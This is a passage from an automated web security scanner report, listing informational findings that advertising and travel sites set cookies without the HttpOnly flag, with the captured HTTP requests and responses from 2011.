Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://cas.criteo.com/delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 02 Oct 2011 23:49:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://cas.criteo.com/delivery/admeld_map?match
...[SNIP]...
14.214. http://tag.admeld.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?admeld_adprovider_id=8&_segment=2%7CPpAVCxNh2PJr%7CGNCT1.16008%7CMIWO2.15840%7CBMBN1.15744%7CEHEX1.15624%7CFACO1.15576%7CSMTC1.15456%7CEMON2.15360 HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://bh.contextweb.com/bh/drts?Rand=Nqa98l0hyRhM
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560; meld_sess=4ec87822-8f33-4202-954a-f6f06a37734b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 35
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:49:54 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

GIF89a.......,.................D..;
14.215. http://tag.contextweb.com/TagPublish/GetAd.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/GetAd.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/GetAd.aspx?tagver=1&ca=VIEWAD&cp=538936&ct=106934&cn=1&epid=&esid=&cf=300X250&rq=1&dw=1074&cwu=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHeadlines%2F0%2C%2C12306%7E2469333%2C00.html&cwr=http%3A%2F%2Fwww.premierleague.com%2Fpage%2FHome%2F0%2C%2C12306%2C00.html&mrnd=96724040&if=0&tl=1&pxy=238,508&cxy=1074,906&dxy=1074,906&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WC=59371_1_3IlqU; FC1-WCR=132981_3_3Ilow^132982_4_3Iloz; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2%0A3115%3B10%2F30%2F2011%3BGNCT1; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|534301.d1b27788-0a91-4596-9a96-e9dad20b3180.0|538569.6c3113bb-f725-48c4-b3a2-8b266db2aca9.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0|537583.f9bdca69-e609-4297-9145-48ea56a0756c.0"; cw=cw

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: private, max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
CWDL: 8/300
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5997
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:49:28 GMT
Connection: close
Set-Cookie: 538936_3_106934_1=EMPTY; Domain=.contextweb.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: FC1-WC=59764_2_3KjzP; Domain=.contextweb.com; Expires=Wed, 02-Oct-2041 19:49:28 GMT; Path=/
Set-Cookie: CDSActionTracking6=ENufC6tGDSs5|PpAVCxNh2PJr|538936|3448|7061|59764|134043|106934|3|345|25|premierleague.com|2|8|1|0|2|1|2|EMON2.EHEX1.SMTC1.FACO1.BMBN1.MIWO2.GNCT1|1|1|-HAZoarNoKZDius-txPklIg7Z5oU_7wk6upA9MEPZ1w^|I|3JX6w|3UPoY; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 19:49:27 GMT; Path=/
Set-Cookie: vf=2; Domain=.contextweb.com; Expires=Mon, 03-Oct-2011 04:00:00 GMT; Path=/

document.write(decodeURIComponent("%3Cscript%20type%3D%22text%2Fjavascript%22%3E%0D%0Afunction%20pr_swfver%28%29%7B%0D%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0D%0Aif%28nv.plugins
...[SNIP]...
14.216. http://tap.rubiconproject.com/oz/feeds/targus/profile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/feeds/targus/profile

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/feeds/targus/profile?p=targus&oz_source=partner&segment=000&zip=&dob=&gender=&pc= HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7845/12566
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; dq=5|5|0|0; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk2=0; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; rdk=7845/12566; rdk15=0; ses15=13378^2&13209^2&12566^1; csi15=3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 204 No Content
Date: Sun, 02 Oct 2011 23:51:41 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: dq=7|7|0|0; Expires=Mon, 01-Oct-2012 23:51:41 GMT; Path=/
Set-Cookie: lm="2 Oct 2011 23:51:41 GMT"; Version=1; Domain=.rubiconproject.com; Max-Age=31536000; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

14.217. http://tap.rubiconproject.com/oz/sensor  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /oz/sensor

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /oz/sensor?p=rubicon&pc=7743/12359&cd=false&xt=16&k=pm+bst:248,norwich+city:192,7+11:160,10+7:160,unbeaten+run:144,keep+unbeaten:144,manchester+united:144,will+keep:144,confident+manchester:144,anderson+confident:144,run+going:144,united+will:144,football+news:128,news:94,city+goal:80,champions+league:80,watch:76,will+give:64,table+results:64,football+new:64,45+pm:64,00+pm:64,7+45:64,old+trafford:64,15+00:64,match+kicks:64,trafford+crowd:64,newly+promoted:64,crowd+will:64,midfielder+believes:64,brazilian+midfielder:64,promoted+club:64,goal:60,football:60,europa+league:56,30+pm:56,manchester:52,united:52,norwich:50,15+pm:48,&t=Anderson+confident+Manchester+United+will+keep+unbeaten+run+going+against+Norwich+City+-+Goal.com HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 204 No Content
Date: Mon, 03 Oct 2011 00:01:01 GMT
Server: TRP Apache-Coyote/1.1
p3p: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: Tue, 01 Jan 2008 00:12:30 GMT
Cache-control: private
Set-Cookie: cd=false; Domain=.rubiconproject.com; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: dq=8|6|2|0; Expires=Tue, 02-Oct-2012 00:01:01 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

14.218. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /partner/agent/rubicon/channels.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partner/agent/rubicon/channels.js?cb=oz_onPixelsLoaded&pc=7743/12359 HTTP/1.1
Host: tap.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; cd=false; dq=6|6|0|0; lm="2 Oct 2011 23:50:10 GMT"; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462; csi2=3188003.js^2^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; csi15=3226249.js^3^1317599341^1317599886&3188004.js^2^1317599406^1317599881&2748761.js^1^1317599431^1317599431&3209195.js^2^1317595891^1317598688; ses1=13209^5; csi1=3226243.js^1^1317599890^1317599890&3226929.js^2^1317599456^1317599882&3226251.js^2^1317599333^1317599350; ses9=12359^1; csi9=3154654.js^1^1317599933^1317599933; ses2=13378^2&12566^2&12359^1; rdk=7743/12359; ses15=13378^2&13209^3&12566^2&12359^2

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:01:07 GMT
Server: TRP Apache-Coyote/1.1
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/javascript;charset=UTF-8
Content-Length: 941
Cache-control: private
Set-Cookie: khaos=GT3FYRAA-6-CO8F; Domain=.rubiconproject.com; Expires=Tue, 01-Oct-2019 00:01:07 GMT; Path=/
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Connection: close


var oo_profile={
tokenType : "0",
tracking : "",
tags : "Sports and Recreation,Hobbies and Interests,Education,Toys and Games,Family and Parenting,Democrats",
tagcloud : [
{ tag: "Spo
...[SNIP]...
14.219. http://travel.travelocity.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city& HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSID=50C7F54C8E08272A256D4F9FCD45DA82.p0611; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Set-Cookie: JSESSIONID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ex.lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://travel.travelocity.com/hotel/HotelAvailability.do?.stc=50C7F54C8E08272A256D4F9FCD45DA82.p0611&dateFormat=mm/dd/yyyy&Service=TRAVELOCITY&cityCountryCode=US&city=bos&returningDate=mm/dd/yyyy&leavingDate=mm/dd/yyyy&searchMode=city&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

14.220. http://travel.travelocity.com/hotel/HotelCobrand.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelCobrand.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /hotel/HotelCobrand.do HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 735
Cache-Control: max-age=0
Origin: http://www.travelocity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Service=TRAVELOCITY&SEQ=60048504&searchMode=city&expr_path=Y&dateFormat=mm%2Fdd%2Fyyyy&opaqueTabSelected=0&cityCountryCode=US&city=bos&state=&TS_HO_destlist=Las+Vegas%7CNV%7CUS&leavingDate=mm%2Fdd%2Fy
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache
Set-Cookie: JSID=AE7752E570B0CD85432B0A6ABF76028D.p0856; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 3616

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!--
JSESSIONID = AE7752E570B0CD85432B0A6ABF76028D.p0856
TPSESSIONID = null
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script
...[SNIP]...
14.221. http://travel.travelocity.com/hotel/HotelDetail.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
14.222. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/NoCacheAction.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pub/gwt/hotel/esf/NoCacheAction.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&service=TRAVELOCITY HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSID=4624190710EDB02407F82A5D5E671CC4.p0739; Domain=.travelocity.com; Path=/
ETag: W/"4888-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 4888

function esf(){var M='',nb='" for "gwt:onLoadErrorFn"',lb='" for "gwt:onPropertyErrorFn"',Y='"><\/script>',$='#',Lb='.cache.html?jsessionid='+jsessionid,ab='/',Fb='226C4CC2E5A5A4FBE9703DC949A8A7C5',Gb
...[SNIP]...
14.223. http://travela.priceline.com/sharedapps/scs  previous  next

